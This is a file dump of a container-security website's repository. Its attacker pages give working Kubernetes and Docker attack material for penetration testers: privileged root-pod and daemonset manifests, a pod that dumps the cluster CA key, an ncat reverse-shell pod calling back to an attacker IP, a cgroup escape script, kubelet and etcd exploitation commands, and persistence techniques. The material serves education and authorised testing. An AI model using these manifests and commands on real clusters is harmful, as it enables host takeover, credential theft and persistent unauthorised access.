├── CNAME ├── README.md ├── _config.yml ├── _includes └── google-analytics.html ├── attackers ├── attacker_manifests.md ├── compromised_container_checklist.md ├── compromised_user_credentials_checklist.md ├── container_breakout_vulnerabilities.md ├── external_attacker_checklist.md └── kubernetes_persistence_checklist.md ├── defenders ├── PCI_Container_Orchestration_Guidance.md ├── container_image_hardening.md ├── kubernetes_api_security.md └── kubernetes_security_architecture_considerations.md ├── general_information ├── container_cve_list.md ├── container_security_standards.md ├── reading_list.md ├── support_lifecycles.md └── tools_list.md ├── images ├── logo.png └── under_construction.gif ├── jargon_busters ├── container_terms_for_security_people.md └── security_terms_for_container_people.md ├── robots.txt └── security_research ├── index.md └── node_proxy.md /CNAME: -------------------------------------------------------------------------------- 1 | www.container-security.site -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Container Security Site 2 | 3 | This is a site with some container security resources. It is (and probably always will be) a work in progress, but hopefully you'll find some useful information. Issues and PRs welcome [on GitHub](https://github.com/raesene/container-security-site). 4 | 5 | ## General Information 6 | 7 | - [Container Reading List](general_information/reading_list.md) 8 | - [Container Terms for Security people](jargon_busters/container_terms_for_security_people.md) 9 | - [Security Terms for Container people](jargon_busters/security_terms_for_container_people.md) 10 | - [Container CVE List](general_information/container_cve_list.md) 11 | - [Container/Kubernetes Security Tools](general_information/tools_list.md) 12 | - [Container Security Standards](general_information/container_security_standards.md) 13 | - [Container Support Lifecycles](general_information/support_lifecycles.md) 14 | - [Container Security Talks](https://talks.container-security.site) 15 | 16 | ## Container Security Workshop 17 | 18 | - [Slides](https://smarticu5.github.io/talks/Steelcon-Container-Security-Workshop/) 19 | 20 | ## Information for Attackers 21 | 22 | Resources for pentesters/redteamers and people looking to get more information about the offensive side of container security. Methodologies for testing and some tooling information. 23 | 24 | - [External Attacker Checklist](attackers/external_attacker_checklist.md) 25 | - [Compromised Container Checklist](attackers/compromised_container_checklist.md) 26 | - [Compromised User Credentials Checklist](attackers/compromised_user_credentials_checklist.md) 27 | - [Attacker Manifests](attackers/attacker_manifests.md) 28 | - [Container Breakout Vulnerabilities](attackers/container_breakout_vulnerabilities.md) 29 | - [Kubernetes Persistence Checklist](attackers/kubernetes_persistence_checklist.md) 30 | 31 | ## Information for Defenders 32 | 33 | - [PCI Container Orchestration Guidance for Kubernetes](defenders/PCI_Container_Orchestration_Guidance.md) 34 | - [Kubernetes Security Architecture Considerations](defenders/kubernetes_security_architecture_considerations.md) 35 | - [Kubernetes RBAC Good Practice](https://kubernetes.io/docs/concepts/security/rbac-good-practices/) - This docs page gives guidance on avoiding common Kubernetes RBAC pitfalls. 
36 | - [Kubernetes API Server Bypass Risks](https://kubernetes.io/docs/concepts/security/api-server-bypass-risks/) - This docs page shows places where it may be possible to bypass the Kubernetes API server, an important point as many security controls are focused on the API server. 37 | 38 | ## Security Research 39 | 40 | Content that relates to container security but doesn't neatly fit in to attacker/defender buckets 41 | 42 | - [Node/Proxy Rights in Kubernetes](security_research/node_proxy.md) 43 | 44 | 45 | 46 | ## Questions? 47 | 48 | you can find me on Mastodon 49 | -------------------------------------------------------------------------------- /_config.yml: -------------------------------------------------------------------------------- 1 | remote_theme: pmarsceill/just-the-docs 2 | plugins: 3 | - jekyll-feed 4 | title: [container-security site] 5 | description: [A site about container security] 6 | logo: "images/logo.png" 7 | ga_tracking: G-CRQ9HG0N7J 8 | aux_links: 9 | "Edit on GitHub": 10 | - "https://github.com/raesene/container-security-site" 11 | -------------------------------------------------------------------------------- /_includes/google-analytics.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | -------------------------------------------------------------------------------- /attackers/attacker_manifests.md: -------------------------------------------------------------------------------- 1 | # Attacker Manifests 2 | 3 | These are Kubernetes manifests that could be useful on security assessments, or pentests. 4 | 5 | N.B. for pentesters, make sure you have delete rights to the objects you create and make sure to clean up when you're done! 6 | 7 | ## General form 8 | 9 | * `kubectl create -f [MANIFEST.YAML]` creates object contained in a file called [MANIFEST.YAML] 10 | * `kubectl delete -f [MANIFEST.YAML]` deletes object contained in a file called [MANIFEST.YAML] 11 | 12 | if you want to create the objects in a specific namespace that isn't your current active one add the following to your manifest under metadata 13 | 14 | ```yaml 15 | namespace: [NAMESPACENAME] 16 | ``` 17 | 18 | ## Root Pod 19 | 20 | This manifest will create a privileged pod on a node in the cluster. Once it's running `kubectl exec -it noderootpod chroot /host` should give you a root shell on the node. 21 | 22 | This won't work if :- 23 | 24 | 1. You don't have right to create pods in the namespace. You'll also need rights to pod/exec in order to get the shell in the pod afterwards. 25 | 2. The node can't pull images from Docker Hub 26 | 3. There's PodSecurityPolicies (or equivalent) blocking the creation of privileged pods 27 | 28 | ```yaml 29 | apiVersion: v1 30 | kind: Pod 31 | metadata: 32 | name: noderootpod 33 | labels: 34 | spec: 35 | tolerations: 36 | - key: node-role.kubernetes.io/master 37 | effect: NoSchedule 38 | hostNetwork: true 39 | hostPID: true 40 | hostIPC: true 41 | containers: 42 | - name: noderootpod 43 | image: busybox 44 | securityContext: 45 | privileged: true 46 | volumeMounts: 47 | - mountPath: /host 48 | name: noderoot 49 | command: [ "/bin/sh", "-c", "--" ] 50 | args: [ "while true; do sleep 30; done;" ] 51 | volumes: 52 | - name: noderoot 53 | hostPath: 54 | path: / 55 | ``` 56 | 57 | ## Root daemonset 58 | 59 | This manifest does the same thing as the pod one, except it creates a pod on every cluster node (including control plane nodes in un-managed clusters). 
Once it's running, get a list of pods in the daemonset with `kubectl get daemonset noderootdaemon` then use kubectl exec (as above) to execute the `chroot /host` command in one of the pods 60 | 61 | This won't work if :- 62 | 63 | 1. You don't have right to create daemonsets in the namespace. You'll also need rights to pod/exec to get the shell afterwards. 64 | 2. The node can't pull images from Docker Hub 65 | 3. There's PodSecurityPolicies (or equivalent) blocking the creation of privileged pods by the replicaset controller in that namespace. 66 | 67 | 68 | ```yaml 69 | apiVersion: apps/v1 70 | kind: DaemonSet 71 | metadata: 72 | name: noderootdaemon 73 | labels: 74 | spec: 75 | selector: 76 | matchLabels: 77 | name: noderootdaemon 78 | template: 79 | metadata: 80 | labels: 81 | name: noderootdaemon 82 | spec: 83 | tolerations: 84 | - key: node-role.kubernetes.io/master 85 | effect: NoSchedule 86 | hostNetwork: true 87 | hostPID: true 88 | hostIPC: true 89 | containers: 90 | - name: noderootpod 91 | image: busybox 92 | securityContext: 93 | privileged: true 94 | volumeMounts: 95 | - mountPath: /host 96 | name: noderoot 97 | command: [ "/bin/sh", "-c", "--" ] 98 | args: [ "while true; do sleep 30; done;" ] 99 | volumes: 100 | - name: noderoot 101 | hostPath: 102 | path: / 103 | ``` 104 | 105 | ## Sensitive file logger 106 | 107 | In a scenario where you have create pods and access to pod logs (a right commonly given for diagnostics) but don't have pod/exec, it can still be possible to use your rights to escalate access to a cluster, by creating a pod which cat's a file to STDOUT (as this will be logged in the container logs) 108 | 109 | The manifest below is an example of this. It would work on a kubeadm cluster, when deployed to a master node. To adapt to other scenarios, just change the volume mount and file in the `command` parameter 110 | 111 | ```yaml 112 | apiVersion: v1 113 | kind: Pod 114 | metadata: 115 | name: keydumper-pod 116 | labels: 117 | app: keydumper 118 | spec: 119 | tolerations: 120 | - key: node-role.kubernetes.io/master 121 | effect: NoSchedule 122 | containers: 123 | - name: keydumper-pod 124 | image: busybox 125 | volumeMounts: 126 | - mountPath: /pki 127 | name: keyvolume 128 | command: ['cat', '/pki/ca.key'] 129 | volumes: 130 | - name: keyvolume 131 | hostPath: 132 | path: /etc/kubernetes/pki 133 | type: Directory 134 | ``` 135 | 136 | ## Reverse Shell 137 | 138 | For setups where you only have create pod, but don't have access to pod/exec or pod logs, it's often possible to setup a reverse shell. First setup an ncat listener with something like 139 | 140 | ```bash 141 | ncat -l -p 8989 142 | ``` 143 | 144 | Then use the manifest below. Replace `[IP]` with the IP address of the host with the ncat listener. 
145 | 146 | ```yaml 147 | apiVersion: v1 148 | kind: Pod 149 | metadata: 150 | name: ncat-reverse-shell-pod 151 | spec: 152 | tolerations: 153 | - key: node-role.kubernetes.io/master 154 | effect: NoSchedule 155 | containers: 156 | - name: ncat-reverse-shell 157 | image: raesene/ncat 158 | volumeMounts: 159 | - mountPath: /host 160 | name: hostvolume 161 | args: ['[IP]', '8989', '-e', '/bin/bash'] 162 | volumes: 163 | - name: hostvolume 164 | hostPath: 165 | path: / 166 | type: Directory 167 | ``` 168 | -------------------------------------------------------------------------------- /attackers/compromised_container_checklist.md: -------------------------------------------------------------------------------- 1 | # Attackers - Compromised Container Checklist 2 | 3 | A list of things you can try if you're doing a CTF/Pentest/Bug bounty and find yourself in a container. 4 | 5 | ## Confirming you're in a container. 6 | 7 | ### Docker 8 | 9 | - `ls -al /.dockerenv` - If this file exists, it's a strong indication you're in a container 10 | - `ps -ef` - Not a definitive tell, but if there are no hardware management processes, it's a fair bet you're in a container 11 | - `ip addr` - Again not definitive, but `172.17.0.0/16` is the default docker network, so if all you have is network stats, this is useful 12 | - `ping host.docker.internal` - should respond if you're in a docker container 13 | 14 | ### Tools for checking 15 | 16 | - Run [amicontained](https://github.com/genuinetools/amicontained) 17 | 18 | ## Breaking out 19 | 20 | ### High level areas 21 | 22 | - File mounts. What information can you see from the host 23 | - Granted Capabilities. Do you have extra rights 24 | - Kernel version. Is it a really old kernel which has known exploits. 25 | 26 | ### Tooling 27 | 28 | [tools list here](../general_information/tools_list.md) 29 | 30 | ### Manual breakout - privileged containers 31 | 32 | If you find out from amicontained or similar that you are in a privileged container, some ways to breakout 33 | 34 | From [this tweet](https://twitter.com/_fel1x/status/1151487051986087936) this is a shell script which runs commands on the underlying host from a privileged container. 35 | 36 | ```bash 37 | d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)` 38 | mkdir -p $d/w;echo 1 >$d/w/notify_on_release 39 | t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` 40 | touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh 41 | $1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o 42 | ``` 43 | 44 | save it as `escape.sh` and you can use it like 45 | 46 | ```bash 47 | ./escape.sh ps -ef 48 | ``` 49 | 50 | Another approach for privileged containers is just to mount the underlying root filesystem. Run the `mount` command to get a list of filesystems. Usually files like `/etc/resolv.conf` are mounted off the underlying node disk, so just find that disk and mount the entire thing under something like `/host` and it'll provide edit access to the node filesystem 51 | 52 | ### Manual breakout - Access to the Docker socket 53 | 54 | If the tooling suggests that the Docker socket is available at `/var/run/docker.sock` then you can just get the docker CLI tool and run any docker command. To breakout use :- 55 | 56 | * `docker run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host` - From [this](https://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/) post. This will drop you into a root shell on the host. 
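If the docker CLI isn't available inside the compromised container, the same daemon can be driven directly over the socket with curl. A minimal sketch, assuming curl is present and the socket is mounted at the default path:

```bash
# Confirm the socket is usable by asking the daemon for its version information
curl -s --unix-socket /var/run/docker.sock http://localhost/version

# Enumerate running containers via the Engine API (roughly the same data as `docker ps`)
curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json
```

From there the full Engine API is available, so it's also possible to create and start a privileged container with the host filesystem mounted purely via HTTP requests, but downloading a static docker CLI binary into the container is usually the quicker route.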
57 | 58 | ## Other Avenues of attack 59 | 60 | Avenues of attack that aren't directly related to breaking out of the container. 61 | 62 | ### keyctl-unmask 63 | 64 | As described in [this post](https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/) it may be possible to get keys from the kernel keyring on a Docker host, and use those for breakouts or other access to the host or related machines. 65 | 66 | -------------------------------------------------------------------------------- /attackers/compromised_user_credentials_checklist.md: -------------------------------------------------------------------------------- 1 | # Attackers - Compromised User Credential Checklist 2 | 3 | This could apply where you have access to a container with a service token mounted, or have got access to a set of user credentials for a cluster. 4 | 5 | ## What rights do you have? 6 | 7 | The first place to start is to see what access you've got. You can do this with just `kubectl`. `kubectl auth can-i --list` will list all the permissions the currently configured user has; you can also use `rakkess` to achieve the same result. 8 | 9 | ## Escalating privileges 10 | 11 | Depending on what rights your user has, there are a number of possible routes for privilege escalation :- 12 | 13 | ### Create Daemonset (and exec into container) 14 | 15 | If you have create daemonset rights (and there aren't any Pod Security Policies or similar in place) and also pod/exec rights, getting cluster-admin is pretty easy in an unmanaged cluster, and possible in a managed cluster depending on the configuration. Create an instance of the [root daemonset](attacker_manifests.md) and then for each created pod you can exec into a root shell on the node. Once you find a shell on a control plane node, the easiest way to get cluster admin is either to get a pre-created cluster-admin certificate (in `kubeadm` clusters this is located at `/etc/kubernetes/admin.conf`) or to mint a new certificate with a group membership of `system:masters`. Assuming the certificate authority files are held in `/etc/kubernetes/pki`, the following commands can be used to create a user certificate :- 16 | 17 | * `openssl genrsa -out user1.key 2048` 18 | * `openssl req -new -key user1.key -out user1.csr -subj "/CN=user1/O=system:masters"` 19 | * `openssl x509 -req -in user1.csr -CA /etc/kubernetes/pki/ca.crt -CAkey /etc/kubernetes/pki/ca.key -CAcreateserial -out user1.crt` 20 | 21 | In a managed cluster, the above procedure won't work, as you don't have shell access to the control plane nodes. For this, one approach would be to get your daemonset, exec a root shell into each node, and then use CRI level commands (so `docker` where it's in use or `crictl` for other environments) to examine each container running on the node and take copies of the service account files, looking for a highly privileged token to use. 22 | 23 | 24 | ### Create Pod (and exec into container) 25 | **You can try out this attack using Kube Security Lab, using the ssh-to-create-pods-multi-node playbook [here](https://github.com/raesene/kube_security_lab)** 26 | 27 | The approach here is relatively similar to the daemonset, except that you'll need to target your pod at a control plane node and ensure you tolerate the `NoSchedule` taint that's likely to be set there. 28 | 29 | 1. Use `kubectl get nodes` to get a list of nodes (you need list on node resources for this) 30 | 2. 
Modify the [root pod manifest](./attacker_manifests.md) with a `NodeName` field in the spec as described [here](https://kubernetes.io/docs/concepts/scheduling-eviction/assign-pod-node/#nodename) 31 | 3. create the pod and then exec into it. -------------------------------------------------------------------------------- /attackers/container_breakout_vulnerabilities.md: -------------------------------------------------------------------------------- 1 | # Container Breakout Vulnerabilities 2 | 3 | A list of CVEs in the various parts of the container stack that could allow for unauthorised access to host resources (e.g. filesystem, network stack) from a container. 4 | 5 | With Linux issues it can be a bit tricky to say if they're container escapes or not so generally looking at ones where container escape has been demonstrated. 6 | 7 | 8 | ## Linux CVEs 9 | 10 | - [CVE-2022-0847](https://dirtypipe.cm4all.com/) - a.k.a DirtyPipe. Vulnerability allows for overwrite of files that should be read-only. Basic container information [here](https://blog.aquasec.com/cve-2022-0847-dirty-pipe-linux-vulnerability), full container breakout PoC writeup [here](https://www.datadoghq.com/blog/engineering/dirty-pipe-container-escape-poc/) and code [here](https://github.com/DataDog/dirtypipe-container-breakout-poc) 11 | - [CVE-2022-0492](https://access.redhat.com/security/cve/cve-2022-0492). Vulnerability in cgroup handling can allow for container breakout depending on isolation layers in place. Container breakout details [here](https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/) 12 | - [CVE-2022-0185](https://www.willsroot.io/2022/01/cve-2022-0185.html) - Local privilege escalation, needs CAP_SYS_ADMIN either at the host level or in a user namespace 13 | - [CVE-2021-3490](https://www.crowdstrike.com/blog/exploiting-cve-2021-3490-for-container-escapes/) - Vulnerability in the eBPF subsystem allows for container breakout if the container has CAP_BPF (see also [proof of concept](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490)) 14 | - [CVE-2021-31440](https://www.zerodayinitiative.com/blog/2021/5/26/cve-2021-31440-an-incorrect-bounds-calculation-in-the-linux-kernel-ebpf-verifier) - eBPF incorrect bounds calculation allows for privesc. 15 | - [CVE-2021-22555](https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html) - Linux LPE used to break out of Kubernetes pod by the researcher 16 | - [CVE-2017-1000112](https://capsule8.com/blog/practical-container-escape-exercise/) - memory corruption in UFO packets. 17 | - [CVE-2016-5195](https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-5195) - (a.k.a 'dirty CoW') - race condition leading to incorrect handling of Copy on Write. 18 | - [CVE-2017-5123](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5123) - vulnerability in the WaitID syscall. 19 | 20 | ## runc CVEs 21 | 22 | - [CVE-2024-21626](https://snyk.io/blog/leaky-vessels-docker-runc-container-breakout-vulnerabilities/) - a.k.a. Leaky Vessels, allows for container escape if running a malicious image, or building a malicious Dockerfile, directly, or indirectly (i.e. through a `FROM` instruction). 23 | - [CVE-2021-30465](http://blog.champtar.fr/runc-symlink-CVE-2021-30465/) - race condition when mounting volumes into a container allows for host access. 24 | - [CVE-2019-19921](https://nvd.nist.gov/vuln/detail/CVE-2019-19921) - TOCTOU in runC's mount operations that allows to break out of the container. 
25 | - [CVE-2019-5736](https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html) - overwrite runc binary on the host system at container start, see also [explanation](https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/) 26 | - [CVE-2016-9962](https://bugzilla.suse.com/show_bug.cgi?id=1012568#c2) - access to a host file descriptor allows for breakout. 27 | 28 | ## Containerd CVEs 29 | - [CVE-2022-23648](https://bugs.chromium.org/p/project-zero/issues/detail?id=2244) - Vuln in volume mounting allows for arbitrary file read from the underlying host, leading to likely indirect container breakout. PoC exploit [here](https://github.com/raesene/CVE-2022-23648-POC) 30 | 31 | ## CRI-O CVEs 32 | 33 | - [CVE-2022-0811](https://www.crowdstrike.com/blog/cr8escape-new-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/) - Vulnerability in setting sysctls in k8s/OpenShift manifests allows for container breakout. Linked post has full PoC details. 34 | - [CVE-2019-14891](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14891) allows containers to access the host's network 35 | 36 | ## Docker CVEs 37 | 38 | - [CVE-2024-23653](https://snyk.io/blog/cve-2024-23653-buildkit-grpc-securitymode-privilege-check/) - missing privilege check in Docker BuildKit allowing for container escape when building an image using a malicious Dockerfile or upstream image (i.e. when using FROM) 39 | - [CVE-2024-23651](https://snyk.io/blog/cve-2024-23651-docker-buildkit-mount-cache-race/) - race condition in Docker BuildKit allowing for container escape when building an image using a malicious Dockerfile or upstream image (i.e. when using FROM) 40 | - [CVE-2021-21284](https://github.com/moby/moby/security/advisories/GHSA-7452-xqpj-6rpc) - When using user namespaces, a user with some access to the host filesystem can modify files which they should not have access to. 41 | - [CVE-2019-14271](https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/) - An issue in the implementation of the Docker "cp" command can lead to full container escape when exploited by an attacker 42 | 43 | ## Kubernetes CVES 44 | - [CVE-2021-25741](https://groups.google.com/g/kubernetes-security-announce/c/nyfdhK24H7s) - race condition in when using hostPath volumes allows for privileged access to host filesystem 45 | - [CVE-2021-25737](https://groups.google.com/g/kubernetes-security-announce/c/xAiN3924thY) - unauthorized access to host network stack by using endpoint slices 46 | - [CVE-2017-1002101](https://github.com/kubernetes/kubernetes/issues/60813) - subpath volume mount handling allows arbitrary file access in host filesystem 47 | - [CVE-2017-1002102](https://github.com/kubernetes/kubernetes/issues/60814) - Arbitrary deletion of files on the host possible when using some Kubernetes volume types 48 | 49 | ## Cloud provider tooling 50 | 51 | - [CVE-2021-3100, CVE-2021-3101, CVE-2022-0070, CVE-2022-0071](https://unit42.paloaltonetworks.com/aws-log4shell-hot-patch-vulnerabilities/) AWS' hot patch package for log4shell allowed for container escape, if a container contains a malicious "java" executable which will be run uncontainerized. 
52 | 53 | ## Additional resources related to escaping containers 54 | 55 | - [Cross Container Attacks: The Bewildered eBPF on Clouds (2023)](https://www.usenix.org/system/files/usenixsecurity23-he.pdf) describes how the `CAP_BPF+CAP_PERFMON` 56 | (or `CAP_SYS_ADMIN`) capabilities can be abused to escape containers. 57 | - [Towards Improving Container Security by Preventing Runtime Escapes (2021)](https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=9652631) analyzes 59 CVEs for 11 container runtimes. 58 | - [Bad Pods: Kubernetes Pod Privilege Escalation](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation) describes common scenarios of dangerous Kubernetes pod configurations, and how/if it's possible to escape in each case. 59 | 60 | ## Reference Links 61 | 62 | - [Linux Kernel Exploitation](https://github.com/xairy/linux-kernel-exploitation/blob/master/README.md) - Extensive maintained list of links relating to Linux Kernel Exploitation 63 | - [Hacking Kubernetes](https://hacking-kubernetes.info/) - Hacking Kubernetes book site has a set of Container Breakout CVEs 64 | -------------------------------------------------------------------------------- /attackers/external_attacker_checklist.md: -------------------------------------------------------------------------------- 1 | # Attackers - External Checklist 2 | 3 | External attackers are typically looking for listening services. The list below covers likely container-related service ports, with notes on testing/attacking them. 4 | 5 | ## 2375/TCP - Docker 6 | 7 | This is the default insecure Docker port. It's an HTTP REST API, and usually access results in root on the host. 8 | 9 | ### Testing with Docker CLI 10 | 11 | The easiest way to attack this is just to use the docker CLI. 12 | 13 | * `docker -H tcp://[IP]:2375 info` - This will confirm access and return some information about the host 14 | * `docker -H tcp://[IP]:2375 run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host` - From [this](https://zwischenzugs.com/2015/06/24/the-most-pointless-docker-command-ever/) post. This will drop you into a root shell on the host. 15 | 16 | --- 17 | 18 | ## 2376/TCP - Docker 19 | 20 | This is the default port for the Docker daemon where it requires credentials (client certificate), so you're unlikely to get far without that. If you do have the certificate and key for access :- 21 | 22 | * `docker --tlsverify --tlscacert=ca.pem --tlscert=cert.pem --tlskey=key.pem -H=[IP]:2376 info` - format for the info command to confirm access. 23 | * `docker --tlsverify --tlscacert=ca.pem --tlscert=cert.pem --tlskey=key.pem -H=[IP]:2376 run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host` - root on the host 24 | 25 | --- 26 | 27 | ## 443/TCP, 6443/TCP, 8443/TCP - Kubernetes API server 28 | 29 | Typical ports for the Kubernetes API server. 30 | 31 | ### Testing for access 32 | 33 | Access to the `/version` endpoint will often work without valid credentials (using curl), as this is made available to unauthenticated users. 34 | 35 | * `kubectl --insecure-skip-tls-verify --username=system:unauthenticated -s https://[IP]:[PORT] version` - Test for access with kubectl 36 | * `curl -k https://[IP]:[PORT]/version` - Test for access with curl 37 | 38 | ### Checking permissions 39 | 40 | It's possible that unauthenticated users have been provided more access. 
You can check what permissions you have with 41 | 42 | * `kubectl --insecure-skip-tls-verify --username=system:unauthenticated -s https://[IP]:[PORT] auth can-i --list` 43 | 44 | ### Getting privileged access to cluster nodes 45 | 46 | In the event that you have create pods access without authentication, see [attacker manifests](attacker_manifests.md) for useful approaches. 47 | 48 | --- 49 | 50 | ## 2379/TCP - etcd 51 | 52 | The authentication model used by etcd, when supporting a Kubernetes cluster, is relatively straightforward. It uses client certificate authentication where **any** certificate issued by its trusted CA will provide full access to all data. In terms of attacks, there are two options: unauthenticated access and authenticated access. 53 | 54 | ### Unauthenticated Access 55 | **You can try out this attack using Kube Security Lab, using the etcd-noauth.yml playbook [here](https://github.com/raesene/kube_security_lab)** 56 | 57 | A good general test for this is to use curl to access the `/version` endpoint. Although most endpoints don't respond well to curl in etcdv3, this one will and it'll tell you whether unauthenticated access is possible or not. 58 | 59 | ```bash 60 | curl [IP]:2379/version 61 | ``` 62 | 63 | If that returns version information, it's likely you can get unauthenticated access to the database. A good first step is to dump all the keys in the database, using etcdctl. First you need to set this environment variable so that etcdctl knows it's talking to a v3 server. 64 | 65 | ```bash 66 | export ETCDCTL_API=3 67 | ``` 68 | 69 | Then this command will enumerate all the keys in the database. 70 | 71 | ```bash 72 | etcdctl --insecure-skip-tls-verify --insecure-transport=false --endpoints=https://[IP]:2379 get / --prefix --keys-only 73 | ``` 74 | 75 | With a list of keys to hand, the next step is generally to find useful information for further attacks. 76 | 77 | --- 78 | 79 | ## 5000/TCP - Docker Registry 80 | 81 | Generally the goal of attacking a Docker registry is not to compromise the service itself, but to either read sensitive information stored in container images and/or modify stored container images. 82 | 83 | ### Enumerating repositories/images 84 | 85 | Whilst you can do this with just curl, it's probably more efficient to use some of the [registry interaction tools](tools_list.md#container-registry-tooling). For example `go-pillage-reg` will dump a list of the repositories in a registry as well as the details of all the manifests of those images. 86 | 87 | 88 | --- 89 | 90 | ## 10250/TCP - kubelet 91 | **You can try out this attack using Kube Security Lab, using the rwkubelet-noauth.yml playbook [here](https://github.com/raesene/kube_security_lab)** 92 | 93 | The main kubelet port will generally be present on all worker nodes, and *may* be present on control plane nodes, if the control plane components are deployed as containers (e.g. with kubeadm). Authentication to this port is usually via client certificates, and there's typically no authorization in place. 94 | 95 | Trying the following request should either give a 401 (showing that a valid client certificate is required) or return some JSON metrics information (showing you have access to the kubelet port). 96 | 97 | ```bash 98 | curl -k https://[IP]:10250/metrics 99 | ``` 100 | 101 | Assuming you've got access you can then execute commands in any container running on that host. As the kubelet controls the CRI (e.g. 
Docker) it's typically going to provide privileged access to all the containers on the host. 102 | 103 | The easiest way to do this is to use Cyberark's [kubeletctl](https://github.com/cyberark/kubeletctl). First scan the host to show which pods can have commands executed in them. 104 | 105 | ```bash 106 | kubeletctl scan rce --server [IP] 107 | ``` 108 | 109 | Then you can use this command to execute commands in one or more of the vulnerable pods. Just replace `whoami` with the command of your choice and fill in the details of the target pod, based on the information returned from the scan command. 110 | 111 | ```bash 112 | kubeletctl run "whoami" --namespace [NAMESPACE] --pod [POD] --container [CONTAINER] --server [IP] 113 | ``` 114 | 115 | If you don't have `kubeletctl` available but do have `curl`, you can use it to do the same thing. First get the pod listing. 116 | 117 | ```bash 118 | curl -k https://[IP]:10250/pods/ | jq 119 | ``` 120 | 121 | From that, pull out the namespace, pod name and container name that you want to run a command in, then issue this command, filling in the blanks appropriately. 122 | 123 | ```bash 124 | curl -k https://[IP]:10250/run/[Namespace]/[Pod]/[Container] -XPOST -d "cmd=[COMMAND]" 125 | ``` 126 | 127 | --- 128 | 129 | ## 10255/TCP - kubelet read-only 130 | 131 | The kubelet read-only port is generally only seen on older clusters, but can provide some useful information disclosure if present. It's an HTTP API which will have no encryption and no authentication requirements on it, so it's easy to interact with. 132 | 133 | The most useful endpoint will be `/pods/`, so retrieving it using curl (as below) and looking at the output for useful information is likely to be the best approach. 134 | 135 | 136 | ```bash 137 | curl http://[IP]:10255/pods/ | jq 138 | ``` -------------------------------------------------------------------------------- /attackers/kubernetes_persistence_checklist.md: -------------------------------------------------------------------------------- 1 | # Kubernetes persistence checklist 2 | 3 | Once you've got access to a cluster, if part of the review includes checking for persistence, there are some ways in Kubernetes to do that. Essentially there are three options for persistence: 4 | 5 | 1. Service Account Secrets. In Kubernetes < 1.24, all service accounts in the cluster have an associated secret (which is a JWT token) which does not expire. If you have access to secrets, especially in the `kube-system` namespace, you can take a copy of the secret and use it to authenticate to the cluster indefinitely. 6 | - First check permissions using `kubectl auth can-i get secrets -n kube-system`; this will let you know if you have access. 7 | - Then if you have access, just run `kubectl get secrets -n kube-system -o yaml` and copy the secret you want. The `token` field is the JWT token. 8 | - You can then use the token with `kubectl -s [SERVER] --token [TOKEN] [COMMAND]` to authenticate to the cluster. Take care that there is not a kubeconfig file in the home directory of the user you are running this as, as it will take precedence over the command line supplied token. 9 | 2. CSR API. If you have access to the Certificate Signing Request API, you can use it to mint new client certificates for the cluster, which will give you persistent access to the cluster. To do this you'll ideally need `update` on `certificatesigningrequests/approval` resources, but TBH you're likely to get that through having a `cluster-admin` level account. 
10 | - First check permissions using `kubectl auth can-i update certificatesigningrequests/approval`; this will let you know if you have access. 11 | - Next you need a good username to use for the cert. Likely the best generic one would be `system:kube-controller-manager` as it has a lot of permissions generally and the activity from it looks like generic system activity so might not be noticed by the blue team. 12 | - With this you could manually create and approve a CSR, but it's easier to do it with [teisteanas](https://github.com/raesene/teisteanas). Just run `teisteanas -username system:kube-controller-manager -output-file controller.kubeconfig` which will create a new kubeconfig with a client certificate with that username; it should also tell you how long it'll be valid for (the default is 12 months). 13 | - Now to check access just do `kubectl --kubeconfig controller.kubeconfig auth can-i --list` and you'll see a list of rights including `get` secrets at the cluster level, so that should be good for persistence. 14 | 3. TokenRequest API. This one hit release in Kubernetes 1.22, so will work on more modern versions. It was also beta before that so this technique might work with some tweaking, but you can generally use the secret version there, so no need :) 15 | - First check permissions using `kubectl auth can-i create serviceaccounts/token -n kube-system`; this will let you know if you have access. 16 | - Second, you need a system service account with good rights. `persistent-volume-binder` is a good one that will exist in most clusters. It has `get` on secrets at a cluster level and also the ability to create new pods, amongst other things. 17 | - Again you can do this next bit manually, but [tòcan](https://github.com/raesene/tocan) can make it easier. `tocan -service-account persistent-volume-binder -output-file pvb.kubeconfig -namespace kube-system -expiration-seconds 31536000` will create a new kubeconfig file from that service account using a token which should last for a year. Be aware that some managed k8s versions limit token lifetime (e.g. EKS and GKE), so this would be less useful there. 18 | - Then check permissions with `kubectl --kubeconfig pvb.kubeconfig auth can-i --list` -------------------------------------------------------------------------------- /defenders/PCI_Container_Orchestration_Guidance.md: -------------------------------------------------------------------------------- 1 | # PCI Container Orchestration Guidance for Kubernetes 2 | 3 | In September 2022 the PCI council released [Guidance for Containers and Container Orchestration Tools](https://blog.pcisecuritystandards.org/new-information-supplement-guidance-for-containers-and-container-orchestration-tools) which is intended to help organizations that use tools like Docker and Kubernetes in payment systems do so in a secure fashion. The guidance should also be useful as a general guide to Kubernetes security hardening. 4 | 5 | One of the key parts of the document is a table of risks and best practices which spans 16 areas. 6 | 7 | The guidance is fairly generic, so to help apply this specifically to Kubernetes I've been writing a series of blog posts to look at each of these areas. This page provides a handy index for those posts. As this guidance will be used by assessors as well, I made some notes on the [challenges of doing security assessments on 